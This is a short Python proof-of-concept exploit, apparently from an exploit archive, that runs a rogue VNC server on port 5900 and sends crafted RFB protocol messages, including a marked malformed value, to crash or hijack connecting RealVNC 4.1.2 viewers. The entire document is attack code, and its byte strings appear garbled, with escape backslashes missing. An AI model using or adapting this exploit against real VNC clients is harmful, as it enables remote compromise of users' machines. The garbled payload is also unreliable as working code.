#!/usr/bin/env python
# POC: RealVNC 4.1.2 'vncviewer.exe' RFB Protocol Remote Code Execution Vulnerability, BID 30499
#Author: Andres Lopez Luksenberg <polakocai@gmail.com>
#
import socket

serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('', 5900))
serversocket.listen(1)

while True:
		clientsocket, clientaddres = serversocket.accept()

		data = 'RFB 003.008n'
		clientsocket.sendall(data)

		data_cli = clientsocket.recv(1024)
		print data_cli

		data = 'x01x01'
		clientsocket.sendall(data)

		data_cli = clientsocket.recv(1024)
		print repr(data_cli)

		data = 'x00x00x00x00'
		clientsocket.sendall(data)

		data = 'x02xd0x01x77x08x08x00x00x00x07x00x07x00x03x00x03x06x00x00x00x00x00x00x13x4cx69x6ex75x78x56x4ex43x3ax20x2fx64x65x76x2fx74x74x79x32'

		clientsocket.sendall(data)

		data_cli = clientsocket.recv(1024)
		print repr(data_cli)

		data_cli = clientsocket.recv(1024)
		print repr(data_cli)

		data_cli = clientsocket.recv(1024)
		print repr(data_cli)

		data='x00x00x00x03x00x03x00x03x00x08x00x07'

		data = data + 'x00x00xffxff' #bug

		data = data + 'x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xe7xe7x7ex3cx7exe7xe7'

		clientsocket.sendall(data)

clientsocket.close()	
serversocket.close()

# www.Syue.com [2009-02-02]